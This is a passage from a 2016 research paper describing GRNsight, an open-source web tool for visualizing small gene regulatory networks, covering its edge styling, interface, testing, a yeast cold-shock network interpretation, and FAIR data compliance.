12 characters was added; (c) node size was varied, depending on the size of the label. Customizations were also made for the edges. Instead of undirected, straight line segments, the edges display as directed edges. They are implemented as Bezier curves that straighten when nodes are close together and curve when nodes are far apart. A special case was added to form a looping edge if a node regulated itself. When an unweighted adjacency matrix is uploaded, all edges are displayed as black with pointed arrowheads. When a weighted adjacency matrix is uploaded, edges are further customized based on the sign and magnitude of the weight parameter. As is common practice in biological pathway diagrams (Gostner et al., 2014), activation (for positive weights) is represented by pointed arrowheads, and repression (for negative weights) is represented by a blunt end marker, i.e., a line segment perpendicular to the edge. The thickness of the edge also varies based on the magnitude of the absolute value of the weight. Larger magnitudes have thicker edges and smaller magnitudes have thinner edges. The way that GRNsight determines the edge thickness is as follows: GRNsight divides all weight values by the absolute value of the maximum weight in the adjacency matrix to normalize all the values to between zero and one. GRNsight then adjusts the thickness of the lines to vary continuously from the minimum thickness (for normalized weights near zero) to maximum thickness (normalized weight of one). The color of the edge also imparts information about the regulatory relationship. Edges with positive normalized weight values from 0.05 to 1 are colored magenta; edges with negative normalized weight values from -0.05 to -1 are colored cyan. Edges with normalized weight values between -0.05 and 0.05 are colored grey to emphasize that their normalized magnitude is near zero and that they have a weak influence on the target gene. When a user mouses over an edge, the numerical value of the weight parameter is displayed. When the user drags nodes to customize his or her view of the network, edges adapt their anchor points to the movements of the nodes. User interface The GRNsight user interface includes a menu/status bar and sliders that adjust D3.js’s force graph layout parameters. Figure 4 provides an annotated screenshot of the user interface, highlighting its primary features. Users can move force graph parameter sliders to refine the automated visualization. Nodes have a charge, which repels or attracts other nodes. The charge distance determines at what range a node’s charge will affect other nodes. The link distance determines the minimum distance maintained between nodes. Gravity determines the strength of the force drawing the nodes to the center of the graph. Sliders can be locked to prevent changes and also reset to default values. Graph visualizations can also be modified through manual node dragging. Design decisions for the user interface were driven by applicable interaction design guidelines and principles (Nielsen, 1993; Shneiderman et al., 2016; Norman, 2013) in alignment with the mental model and expectations of the target user base, consisting primarily of biologists, both novice and experienced. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 8/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Test-driven development GRNsight follows an open development model with rigorous documentation of requirements and issues on GitHub. We have implemented an exhaustive unit testing framework using Mocha (https://mochajs.org) and the Chai assertion library (http:// chaijs.com) to perform test-driven development where unit tests are written before new functionality is coded (Martin, 2008). This framework consists of around 160 automated unit tests that examine nearly 530 test files to ensure that the program is running as expected. Table 1 shows the test suite’s coverage report, as generated by Istanbul (https:// gotwarlost.github.io/istanbul/). Error and warning messages have a three-part framework that informs the user what happened, the source of the problem, and possible solutions. This structure follows the alert elements recommended by user interface guideline documents such as the OS X human interface guidelines (https://developer.apple.com/library/mac/documentation/ UserExperience/Conceptual/OSXHIGuidelines/WindowAlerts.html). For example, GRNsight returns an error when the spreadsheet is formatted incorrectly or the maximum number of nodes or edges is exceeded. The File menu includes commands for uploading an adjacency matrix in Microsoft Excel (.xlsx) and other formats. The Demo menu lists four GRNs that have been preloaded into the server. The status display shows the and edge counts. Force graph parameters can be adjusted, locked, or reset using this panel. Some commands are also available in the Format menu. Figure 4 Annotated screenshot of the GRNsight user interface. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 9/24 https://mochajs.org http://chaijs.com http://chaijs.com https://gotwarlost.github.io/istanbul/ https://gotwarlost.github.io/istanbul/ https://developer.apple.com/library/mac/documentation/UserExperience/Conceptual/OSXHIGuidelines/WindowAlerts.html https://developer.apple.com/library/mac/documentation/UserExperience/Conceptual/OSXHIGuidelines/WindowAlerts.html http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Availability GRNsight (currently version 1.18.1) is available at http://dondi.github.io/GRNsight/ and is compatible with Google Chrome version 43.0.2357.65 or higher and Mozilla Firefox version 38.0.1 or higher on the Windows 7 and Mac OS X operating systems. The website is free and open to all users, and there is no login requirement. Website content is available under the Creative Commons Attribution Non-Commercial Share Alike 3.0 Unported License. GRNsight code is available under the open source BSD license from our GitHub repository https://github.com/dondi/GRNsight. Every user’s submitted data are private and not viewable by anyone other than the user. Uploaded data reside as temporary files and are deleted from the GRNsight server during standard operating system file cleanup procedures. A Google Analytics page view counter was implemented on 18 September 2014, and a file upload counter was added on 13 April 2015. From these start dates and as of 12 August 2016, the GRNsight home page has been accessed 2,349 times, and 1,652 files have been uploaded and viewed with GRNsight. Of these 1,652 files, an estimated 148 were uploaded by users outside of our group. RESULTS AND DISCUSSION We have successfully implemented GRNsight, a web application and service for visualizing small- to medium-scale GRNs, fulfilling our five requirements: 1. It exists as a web application without the need to download and install specialized software; 2. It is simple and intuitive to use; 3. It accepts an input file in Microsoft Excel format (.xlsx), as well as SIF (.sif) and GraphML (.graphml); 4. It reads a weighted or unweighted adjacency matrix where the regulatory transcription factors are in columns and the target genes are in rows (Excel format only); 5. It automatically lays out and displays small- to medium-scale, unweighted and weighted, directed network graphs in a way that is familiar to biologists, adding value to the interpretation of the modeling results. GRNsight facilitates interpretation of GRN model results GRNsight facilitates the biological interpretation of unweighted and weighted GRN graphs. Our discussion focuses on two of the demonstration files provided in the Table 1 GRNsight test suite code coverage summary. Denominators represent the number of aspects of each type detected by Istanbul in the GRNsight codebase; numerators represent the subset of these which were executed by unit test code. Aspect of the code Test coverage (percent) Statements 272/371 (73.3%) Branches 158/185 (85.4%) Functions 49/72 (68.1%) Lines 272/371 (73.3%) Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 10/24 http://dondi.github.io/GRNsight/ https://github.com/dondi/GRNsight http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ user interface, Demo #3: Unweighted GRN (21 genes, 31 edges) and Demo #4: Weighted GRN (21 genes, 31 edges; Schade et al., 2004 data). These two files describe GRNs from budding yeast, Saccharomyces cerevisiae, correspond to supplementary data published by Dahlquist et al. (2015), and when displayed by GRNsight, represent interactive versions of Figs. 1 and 8 of that paper, respectively. Figure 5 gives a side-by-side view of the same adjacency matrices laid out by GRNsight and by hand. Figures 5A–5C are derived from Demo #3: Unweighted GRN (21 genes, 31 edges), and Figs. 5D–5F are derived from Demo #4: Weighted GRN (21 genes, 31 edges; Schade et al., 2004 data). Figures 5A and 5D show examples of the automatic layout performed by GRNsight. Figures 5C and 5F show the same adjacency matrices laid out by hand in Adobe Illustrator, corresponding to Figs. 1 and 8 of Dahlquist et al. (2015), respectively. Figures 5B and 5E started with the automatic layout from GRNsight and then were manually manipulated from within GRNsight to lay them out similarly to MSN1 ROX1 FHL1 GTS1 RPH1 ABF1 MAC1 CUP9 PHD1 MSN4 RAP1 AFT1 REB1 HSF1 HAL9 NRG1 YAP6 CIN5SKN7 YAP1 ACE2 w1 w31 w19 w20 w21 w8 w27w29 w30 w28 w17 w16 w10 w4 w18w6 w15 w13 w23w7 w11 w3 w12 w2 w5 w9 w25 w24 w14 w22 w26 MSN1 GTS1 -0.05 -0.30 -0.93 -0.43 -0.51 0.94 -0.53 -0.13-0.75 0.01 0.62 -0.90 -0.40 1.01 0.61 -0.010.08 -0.89 1.23 1.50-1.23 1.43 -0.65 0.54 -0.19 0.16 -2.97 -0.41 -1.36 -0.19 0.57 CUP9 PHD1 REB1 HAL9 NRG1 YAP6 CIN5SKN7 YAP1 ACE2 ABF1 MAC1 MSN4 RAP1 ROX1 AFT1 FHL1 HSF1 RPH1 CIN5 CUP9 FHL1 GTS1 HSF1 MSN1 MSN4 NRG1 RAP1 AFT1 REB1 ROX1 RPH1 YAP1 YAP6 ABF1 ACE2 HAL9 MAC1 PHD1 SKN7 CIN5 CUP9 FHL1 GTS1 HSF1 MSN1 MSN4 NRG1 RAP1 AFT1 REB1 ROX1 RPH1 YAP1 YAP6 ABF1 ACE2 HAL9 MAC1 PHD1 SKN7 CIN5 CUP9 FHL1 GTS1 HSF1 MSN1 MSN4 NRG1 RAP1 AFT1 REB1 ROX1 RPH1 YAP1 YAP6 ABF1 ACE2 HAL9 MAC1PHD1 SKN7 CIN5 CUP9 FHL1 GTS1 HSF1 MSN1 MSN4 NRG1 RAP1 AFT1 REB1 ROX1 RPH1 YAP1 YAP6 ABF1 ACE2 HAL9 MAC1 PHD1 SKN7 A B C D E F Figure 5 Side-by-side comparison of the same adjacency matrices laid out by GRNsight and by hand. (A) GRNsight automatic layout of the demonstration file, Demo #3: Unweighted GRN (21 genes, 31 edges); (B) graph from (A) manually manipulated from within GRNsight; (C) the same adjacency matrix from (A) and (B) laid out entirely by hand in Adobe Illustrator, corresponding to Fig. 1 of Dahlquist et al. (2015); (D) GRNsight automatic layout of the demonstration file, Demo #4: Weighted GRN (21 genes, 31 edges; Schade et al., 2004 data); (E) graph from (D) manually manipulated from within GRNsight; (F) the same adjacency matrix from (D) and (E) laid out entirely by hand in Adobe Illustrator, corresponding to Fig. 8 of Dahlquist et al. (2015). The nodes in (F) are colored in the style of GenMAPP 2 (Salomonis et al., 2007), based on the time course of expression of that gene in the Schade et al. (2004) microarray data (stripes from left to right, 10, 30, and 120 minutes of cold shock, with magenta representing a significant increase in expression relative to the control at time 0, cyan representing a significant decrease in expression relative to the control, and grey representing no significant change in expression relative to the control). Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 11/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Figs. 5C and 5F, respectively. The use of GRNsight represents a substantial time savings compared to creating the same figures entirely by hand and allows the user to try multiple arrangements of the nodes quickly and easily. Note that this type of “by hand” manipulation of graphs is most useful for small- to medium-scale networks, the kind that GRNsight is designed to display, and would not be appropriate for large networks. Viewing the unweighted network (Figs. 5A–5C) allows one to make observations about the network structure (Dahlquist et al., 2015). For example, YAP6 has the highest in-degree, being regulated by six other transcription factors. RAP1 has the highest out- degree of five, regulating four other transcription factors and itself. Four genes, AFT1, NRG1, RAP1, and YAP6, regulate themselves. Many of the transcription factors are involved in regulatory chains, with the longest including five nodes originating at SKN7 or ACE2. There are several other four-node chains that originate at CIN5, MAC1, PHD1, SKN7, and YAP1. Finally, there are two rather complex feedforward motifs involving CIN5, ROX1, and YAP6 and SKN7, YAP1, and ROX1 (Dahlquist et al., 2015). The networks with colored edges (Figs. 5D–5F) display the results of a mathematical model, where the expression levels of the individual transcription factors were modeled using mass balance ordinary differential equations with a sigmoidal production function and linear degradation (Dahlquist et al., 2015). Each equation in the model included a production rate, a degradation rate, weights that denote the magnitude and type of influence of the connected transcription factors (activation or repression), and a threshold of expression. The differential equation model was fit to published yeast cold shock microarray data from Schade et al. (2004) using a penalized nonlinear least squares approach. The visualization produced by GRNsight is displaying the results of the optimized weight parameters. Positive weights > 0 represent an activation relationship and are shown by pointed arrowheads. One example is that CIN5 activates the expression of MSN1. Negative weights < 0 represent a repression relationship and are shown by a blunt arrowhead. One example is that ABF1 represses the expression of MSN1. The thicknesses of the edges also vary based on the magnitude of the absolute value of the weight, with larger magnitudes having thicker edges and smaller magnitudes having thinner edges. In Figs. 5D–5F, the edge corresponding to the repression of the expression of MSN1 by ABF1 stands out as the thickest because the absolute value of its weight parameter (-2.97) has the largest magnitude out of all the weights (Dahlquist et al., 2015). It is noticeable that none of the edges that represent activation are as thick as the ABF1-to- MSN1 edge; only RAP1-to-RPH1 and HAL9-to-MSN4 are close with weights of 1.50 and 1.43, respectively. The color of the edge also imparts information about the regulatory relationship. Edges with positive normalized weight values from 0.05 to 1 are colored magenta (10 edges in this example); edges with negative normalized weight values from -0.05 to -1 are colored cyan (16 edges in this example). Edges with normalized weight values between -0.05 and 0.05 are colored grey to indicate that their normalized magnitude is near zero and that they have a weak influence on the target gene (five edges in this example). The grey color de-emphasizes the weak relationships to the eye, thus emphasizing the stronger colored relationships. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 12/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ Because of this visualization of the weight parameters, one can make some interesting observations about the behavior of the network (Dahlquist et al., 2015). Taking the arrowhead type, thickness, and color into consideration, one can, by visual inspection, group edges by type and relative influence into four activation and four repression bins. RAP1-to-RPH1, HAL9-to-MSN4, and NRG1 to itself have the strongest activation relationships, followed by RAP1-to-MSN4 and CIN5-to-MSN1, followed by NRG1-to-YAP6, MSN4-to-FHL1, SKN7-to-ROX1 and PHD1-to-MSN4, followed by ABF1-to-FHL1 as the weakest of the activation relationships. The aforementioned ABF1-to-MSN1 edge has the strongest repression relationship, followed by ACE2-to-YAP1, RAP1-to-HSF1, CIN5-to-ROX1, AFT1 to itself, and RAP1 to itself, followed by ROX1-to-YAP6, PHD1-to-CUP9, CIN5-to-YAP6, YAP6-to-ROX1, YAP1-to-ROX1, SKN7-to-YAP1, RAP1-to-AFT1, and YAP6 to itself, followed by MAC1-to-CUP9 and SKN7-to-NRG1 as the weakest of the repression relationships. These rankings could have been obtained, of course, by sorting the numerical values of the edges in a table, but it is notable that these groupings can also be picked out by eye and then put into the context of the other network connections. Because the five weakest connections, CUP9-to-YAP6, REB1-to-GTS1, YAP6-to-CIN5, YAP1-to-YAP6, and HSF1-to-REB1, colored grey, are de-emphasized in the visual display, a different interpretation of the network structure can be made as compared to the unweighted network (Figs. 5E and 5F vs. Figs. 5B and 5C). In most cases, nodes in a regulatory chain “drop out” visually “breaking” the chain. For example, in the four-node chain beginning with RAP1-to-HSF1, the last two nodes, REB1 and GTS1, are only weakly connected. In the five-node chains beginning with SKN7-to-YAP1 or ACE2-to-YAP1, and the four-node chains beginning with MAC1-to-CUP9 or PHD1-to-CUP9, the nodes connected to YAP6 drop out (YAP1-to-YAP6, YAP6-to-CIN5, and CUP9-to-YAP6). This suggests that regulatory chains may only be effective to a depth of two levels, and that while longer chains are theoretically possible, given the network connections, they have a negligible effect on the dynamics of expression of downstream genes. Another interpretation of the network structure that is highlighted by the weighted display is that the 21-gene network can be divided into two smaller subnetworks by removing the two edges CUP9-to-YAP6 (grey) and ABF1-to-FHL1 (thin magenta, weakly activating). While this could also be observed in the unweighted network, the application of the weight information, showing only thin connections between the two subnetworks, suggests that they could function relatively independently. Finally, the unweighted display showed two complex feedforward motifs involving CIN5, ROX1, and YAP6 and SKN7, YAP1, and ROX1. The weighted display reveals that the complexity of the connections is reduced because the weak YAP1-to-YAP6 and YAP6-to-CIN5 edges drop out. Furthermore, the display shows that the modeling predicts that the three- node CIN5-ROX1-YAP6 motif is an incoherent type 2 feedforward loop, while the SKN7- YAP1-ROX1 motif is a coherent type 4 feedforward loop, neither of which is found very commonly in Escherichia coli nor S. cerevisiae GRNs (Alon, 2007). The modeling combined with the display suggests that further investigation is warranted: either these two rare types of feedforward loops are important to the dynamics of this particular GRN, Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 13/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ or the network structure is incorrect. In either case, future lines of experimental investigation are suggested to the user. When examining individual genes in the network, one can see that the expression of several genes is controlled by a balance of activation and repression by different regulators. For example, the expression of MSN1 is strongly activated by CIN5, but even more strongly repressed by ABF1. The expression of ROX1 is weakly activated by SKN7 and weakly repressed by YAP1, CIN5, and YAP6. The expression of YAP6 is weakly activated by NRG1, but weakly repressed by itself, CIN5, and ROX1. Furthermore, some transcription factors act both as activators of some targets and repressors of other targets. For example, RAP1 activates the expression of MSN4 and RPH1, but represses the expression of AFT1, HSF1, and itself. PHD1, ABF1, CIN5, and SKN7 also both activate and repress their different target genes in the network. For each of these regulators, there is experimental evidence to support their opposite effects on gene expression, although not necessarily for these particular target genes (RAP1: Shore & Nasmyth, 1987; PHD1: Borneman et al., 2006, ABF1: Buchman & Kornberg, 1990 and Miyake et al., 2004; CIN5 and SKN7: Ni et al., 2009). Except for CIN5, what these genes have in common is that they themselves have no inputs in the network. The remaining no-input genes (ACE2, MAC1, and HAL9) have only one outgoing edge in this network. Because these genes have no inputs and, in some sense, have been artificially disconnected from the larger GRN of the cell, one must not overinterpret the results of the modeling for these genes. Thus, GRNsight enables one to interpret the weight parameters more easily than one could from the adjacency matrix alone. Visual inspection has long been recognized by experts such as Tufte (2001) and Card, Mackinlay & Shneiderman (1999) as distinct from other forms of purely numeric, computational, or algorithmic data analysis, and as the preceding discussion highlights, it is this potential that can be derived specifically by visual inspection that is enabled by GRNsight. Card, Mackinlay & Shneiderman (1999) have identified six major ways, documented in earlier literature and empirical studies, by which information visualization amplifies cognition. Tufte’s (2001) seminal book perhaps states it best: “Graphics reveal data. Indeed graphics can be more precise and revealing than conventional statistical computations.” Note that the nodes in Fig. 5F are also colored in the style of GenMAPP 2 (Salomonis et al., 2007), based on the time course of expression of that gene in the Schade et al. (2004) microarray data (stripes from left to right, 10, 30, and 120 min of cold shock, with magenta representing a significant increase in expression relative to the control at time zero, cyan representing a significant decrease in expression relative to the control, and grey representing nosignificant changein expression relative to thecontrol).Thisfeaturehas not yet been implemented in GRNsight, but is currently under development for Version 2. These observations made by direct inspection of the GRNsight graph are for a relatively small GRN of 21 genes and 31 edges and become more difficult as nodes and edges are added. For much larger networks, a more powerful graph analysis tool such as Cytoscape (Shannon et al., 2003; Smoot et al., 2011) or Gephi (Bastian, Heymann & Jacomy, 2009) is warranted. However, for small networks in the range of 15–35 nodes, GRNsight Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 14/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ fulfills a need to quickly and easily view and manipulate them. The GRN modeled in Dahlquist et al. (2015) and displayed in Fig. 5 was derived from the Lee et al. (2002) and Harbison et al. (2004) datasets generated by chromatin immunoprecipitation followed by microarray analysis. We have also used GRNsight to display GRNs derived from the YEASTRACT database (Teixeira et al., 2014), whose own display tool is static, displaying regulators and targets in two rows. Instructions for viewing YEASTRACT-derived GRNs can be found on the GRNsight Documentation page. While GRNsight was designed originally for viewing GRNs, it is not specific for any particular species, nor for that kind of data. As long as the text strings used as identifiers for the “regulators” and “targets” match, it can be used to visualize any small, unweighted or weighted network with directed edges for systems biology or other application domains. GRNsight development follows best practices for scientific computing and FAIR data principles Veretnik, Fink & Bourne (2008) lament and Schultheiss et al. (2011) document that some computational biology resources, especially web servers, lack persistence and usability, leading to an inability to reproduce results. With that in mind, we have consciously followed best practices for open development (Prli�c & Procter, 2012), scientific computing (Wilson et al., 2014), providing a web resource (Schultheiss, 2011), and FAIR data (Wilkinson et al., 2016), simultaneously following and teaching these practices to the primary developers who were all undergraduates. Each of these practices relates to each other, supporting reproducible research. Open development and long-term persistence As noted in our process requirements in the Introduction, we have followed an open development model since the project’s inception in January 2014, with our code available under the open source BSD license at the public GitHub repository, where we “release early, release often” (Torvalds in Raymond (1999)) and also track requirements, issues, and bugs. Indeed, our project stands on the shoulders of other open source tools. Our unit-testing framework provides confidence that the code works as expected. Detailed documentation for users (web page) and developers (wiki) are provided. Demo data are also provided so users have both an example of how to format input files and can see how the software should perform. As noted by Prli�c & Procter (2012), open development practices have a positive impact on the long-term sustainability of a project. Furthermore, Schultheiss et al. (2011) describe twelve qualities for evaluating web services that sum to a Long-Term-Score, which correlates with persistence of the web service. GRNsight complies with all 12 requirements, providing: a stable web address (using the github.io domain to host the website and Amazon Cloud Services to host the server help to ensure long-term availability), version information, hosting country and institution, last updated date, contact information, high usability, no registration requirement, no download required, example data, fair testing possibility (both with demonstration Excel workbooks and standard SIF and GraphML file types), and a functional service. Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 15/24 http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ We are committed to continue development of the GRNsight resource, fixing bugs and improving the software by adding features. The lead authors (Dahlquist, Dionisio, and Fitzpatrick) are all tenured faculty, overseeing the design, code, testing, and documentation of GRNsight and providing continuity to the project. Together we have mentored the undergraduates (Anguiano, Varshneya, Southwick, and Samdarshi) who had primary responsibility for coding, testing, and documentation, while also being full partners in the design of the software. A pipeline has been established for onboarding new members to the project, also providing continuity. Lawlor & Walsh (2015) detail some of the same issues of reliability and reproducibility in bioinformatics software referred to by Wilson et al. (2014). Lawlor & Walsh (2015) conclude that the ideal way to bring software engineering values into bioinformatics research projects is to establish separate specialists in bioinformatics engineering. We disagree. Through GRNsight, we have shown how best practices can be taught to undergraduates concomitant with training in bioinformatics, as we have shown previously with Master’s level students (Dionisio & Dahlquist, 2008). FAIR data principles The FAIR Guiding Principles for scientific data and stewardship state that data should be Findable, Accessible, Interoperable, and Reusable by both humans and machines (Wilkinson et al., 2016), with “data” loosely construed as any scholarly digital research object, including software. As scientific software that interacts with data, the FAIR principles can apply to both the GRNsight application and the network data it is used to visualize. Thus, we evaluate the GRNsight project in terms of its “FAIRness” below. Findable The Findable principle states that metadata and data should have a globally unique and persistent identifier, and that metadata and data should be registered or indexed in a searchable resource (Wilkinson et al., 2016). In terms of software, the identifier is the name and version. Because we utilize the GitHub release mechanism, GRNsight code is tagged with a version (currently v1.18.1) and each version is available from the release page (https://github.com/dondi/GRNsight/releases). We have registered GRNsight with well- known bioinformatics tools registries: the BioJS Repository (Yachdav et al., 2015; http:// biojs.io/), the Elixir Tools and Data Services Registry (Ison et al., 2016; https://bio.tools/), Bioinformatics.org (http://www.bioinformatics.org/wiki/), and the Links Directory at Bioinformatics.ca (Brazas, Yamada & Ouellette, 2010; https://bioinformatics.ca/links_ directory/), as well as Node Package Manager (NPM, https://www.npmjs.com/). GRNsight has also been presented at scientific conferences, with slides and posters available via SlideShare (http://www.slideshare.net/GRNsight) and with a recent talk and poster at the 2016 Bioinformatics Open Source Conference available via F1000 Research (Dahlquist et al., 2016a; Dahlquist et al., 2016b). We have paid special attention to the metadata associated with our website to increase its Findability via Google search. And, of course, with the publication of this article, GRNsight is Findable in literature databases. In the everyday sense of the word “findable,” one could argue that by being “yet another” Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 16/24 https://github.com/dondi/GRNsight/releases http://biojs.io/ http://biojs.io/ https://bio.tools/ http://www.bioinformatics.org/wiki/ https://bioinformatics.ca/links_directory/ https://bioinformatics.ca/links_directory/ https://www.npmjs.com/ http://www.slideshare.net/GRNsight http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ network visualization tool in a crowded domain (recall 47 other tools recorded by Pavlopoulos et al. (2015)), GRNsight is contributing to a Findability problem for users in the sense that it contributes more “hay” to the “needle in a haystack” problem of finding the right tool for the job. However, we hope that by the actions we have taken and the specificity of our requirements for GRNsight’s functionality, publicly describing both what we mean it to be and what we do not mean it to be, the benefits of adding GRNsight to the diverse pool of network visualization software outweighs the detriments. In addition, the Findable principle states that data should be described with rich metadata and that metadata should include the identifier of the data it describes (Wilkinson et al., 2016). Because GRNsight does not interact directly with a data repository, it is up to individual users to make sure that their data is FAIR compliant with the Findable principle. This is discussed further below with regard to Interoperability and Reusability. Accessible The Accessible principle states that metadata and data should be retrievable by their identifier using a standardized communication protocol, that the protocol is open, free, and universally implementable, that the protocol allows for authentication and authorization procedures, where necessary, and that metadata are accessible, even when the data are no longer available (Wilkinson et al., 2016). As noted before, GRNsight meets the first two criteria, because it is free and open to all users, and there is no login requirement. The source code is available under the open source BSD license and can be NPM installed (given the caveat that the user must be able to support the GRNsight client-server setup). The longevity of GRNsight is partially tied to the longevity of the GitHub repository itself, although the authors maintain local backups. Again, because GRNsight does not interact directly with a data repository, it is up to individual users to make sure that their data is FAIR compliant with the Accessible principle. Since GRNsight does not have any security procedures nor authentication requirements (e.g., password protection; user registration), it is not recommended that sensitive data be uploaded to our GRNsight server. However, users who wish to visualize sensitive data could run a local instance of the GRNsight client-server setup. Interoperable As software, GRNsight does not interact directly with other databases or software, as, for example, Cytoscape does with many pathway and molecular interaction databases or individual Cytoscape apps (formerly plugins; Saito et al., 2012), so it is not Interoperable in that sense. The GRNsight web application is designed to interact directly with a human user and is not set up to import or export data programmatically, as would be necessary to incorporate it into popular workflow environments like Galaxy (Afgan et al., 2016) or be hosted by a tool aggregator such as QUBES Hub (Quantitative Undergraduate Biology Education and Synthesis Hub, https://qubeshub.org/). However, GRNsight is Interoperable in the sense that via the user, it can receive and pass data from and to other programs. In this latter sense, this section could just as easily have been entitled, “95% of Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 17/24 https://qubeshub.org/ http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ bioinformatics is getting your data into the right file format.” Indeed, one of the original motivations and requirements for GRNsight was to seamlessly read and display weighted GRNs that were output as Excel workbooks from the GRNmap MATLAB modeling package (Dahlquist et al., 2015; http://kdahlquist.github.io/GRNmap/). This specialized use case is augmented by GRNsights’s ability to import and export data in the commonly used SIF (http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats. html#sif-format) and GraphML (Brandes et al., 2001; http://graphml.graphdrawing.org/) formats, facilitating movement of data between GRNsight and other network visualization and analysis programs. For instance, one can interact with the GRNsight server component directly, in order to upload Excel workbooks and supported import formats for conversion into JSON then back into a supported export format. Thus, we are in a position to comment on SIF and GraphML with respect to the finer points of data Interoperability, including: metadata and data using a formal, accessible, shared, and broadly applicable language for knowledge representation, metadata and data using vocabularies that follow the FAIR principles, and metadata and data including qualified references to other metadata and data (Wilkinson et al., 2016). When we implemented import and export for the SIF and GraphML formats, we encountered issues due to the variations accepted by these formats which required design decisions that may, in turn, restrict compatibility with other software that we did not test. For example, the SIF format as described in the documentation for Cytoscape v3.4.0 offers quite a few divergent options, including choice of delimiter (space vs. tab), denoting a pairwise list of interactions versus concatenating all the interactions to the same node on the same line, and the choice of relationship type (any string). It only requires node identifiers to be internally consistent to the file, without enforcing the use of IDs from a recognized biological database. While GRNsight strives to read any SIF file, we restricted our export format to tab-delimited, pairwise interactions, and a single relationship type (“pd” for “protein / DNA”) for unweighted networks. For weighted networks, GRNsight exports the weight value as the relationship type. The advantage of SIF is that it is a simple text format; the main disadvantage is that all it is really intended to encode is the interaction between two nodes, which makes including the weight data as GRNsight does a kludge, and including metadata impossible. Moreover, there is no controlled vocabulary for the relationship type, only a list of suggestions in the Cytoscape documentation, from which we selected “pd.” In practice, Cytoscape v3.4.0 defaults to “interacts with” as the relationship type when exporting SIF files. As a simple text format, it does not satisfy the three sub-principles of Interoperability (Wilkinson et al., 2016). In contrast, GraphML, as a richer XML format, has the potential to satisfy the Interoperability criteria. However, as with SIF, we encountered issues because a feature of the format that is intended to facilitate flexibility has, in practice, turned out to degrade Interoperability rather than enhance it. GraphML standardizes only the representation of nodes and edges and their directions; all other characteristics, such as names, weights, and other values, are left for others to specify through a key element, which is not subject to a controlled vocabulary. Although this flexibility is appreciated, it also serves as an enabler for divergence. In particular, two issues arose with interpreting the node Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 18/24 http://kdahlquist.github.io/GRNmap/ http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#sif-format http://manual.cytoscape.org/en/latest/Supported_Network_File_Formats.html#sif-format http://graphml.graphdrawing.org/ http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ identifier and display label. First, because of the lack of a controlled vocabulary, these are defined differently by different programs. Second, in the GRNsight-native Excel format, transcription factors must be unique in the header columns and rows and serve both as a unique ID for that node and the node label. In two implementations of GraphML import/ export that we tested with Cytoscape v3.4.0 and a commercial graph editor called yED (v3.16, https://www.yworks.com/products/yed), an internal node ID is assigned independently of the node label and is not editable by the user. This leads to a situation where the user could assign identical labels to two or more nodes with different IDs, raising an issue for correct display of the network in GRNsight where node ID and node label are synonymous. GRNsight accommodates display of node labels from Cytoscape- and yED-exported GraphML by using a priority system to select among the XML elements it may encounter. Finally, as with SIF, there is no enforcement of the use of IDs from a recognized biological database, even though the potential exists to specify the ID source (at least as a comment) in the XML. The format of a GraphML export by GRNsight is described on the Documentation page (http://dondi.github.io/GRNsight/documentation.html). In our testing, we have ensured that GRNsight can read Cytoscape- and yED-exported GraphML and that GRNsight-exported GraphML was accurately read by these two programs, but we cannot guarantee Interoperability with other software. Any issues that arise will need to be addressed on a case-by-case basis through bug reports at our GitHub repository. Compliance with FAIR principles is facilitated by the BioSharing registry of standards (McQuilton et al., 2016; https://biosharing.org). As of this writing, GraphML is present in the registry, but as an unclaimed, automatically-generated entry. Other formats for sharing network data are potentially more fully FAIR compliant. However, the addition of each new format, while increasing the flexibility and power of the GRNsight software, would incur the cost of additional complexity (http://boxesandarrows.com/complexity- and-user-experience/). This is a corollary of “one thing well” and is, for example, one reason why the complex Cytoscape stand-alone application did not fit our initial product requirements. As demonstrated by our tests with Cytoscape- and yED-exported GraphML, the aphorism that “95% of bioinformatics is getting your data into the right file format” cannot entirely be avoided by developers or users. Reusable The FAIR principles state that metadata and data should be richly described with a plurality of accurate and relevant attributes, released with a clear and accessible usage license, associated with a detailed provenance, and meet domain-relevant community standards. As software, GRNsight is Reusable because the code is available on GitHub under the open source BSD license. The advantage of having followed test-driven development is that a developer who wishes to reuse the code has a test suite ready to guide development of new features. In terms of data, the criteria for Reusability are closely linked to Interoperability. While the GraphML format is capable of storing metadata, the limitations described above in terms of a lack of controlled vocabulary cause it to fail the Reusability test as well. In terms of provenance, GRNsight injects a comment into Dahlquist et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.85 19/24 https://www.yworks.com/products/yed http://dondi.github.io/GRNsight/documentation.html https://biosharing.org http://boxesandarrows.com/complexity-and-user-experience/ http://boxesandarrows.com/complexity-and-user-experience/ http://dx.doi.org/10.7717/peerj-cs.85 https://peerj.com/computer-science/ the GraphML recording what version of GRNsight exported the data (as does yED v3.16, but not Cytoscape v3.4.0). We also note that the GRNmap Excel workbook format with multiple worksheets has the potential to record both metadata and provenance, although this 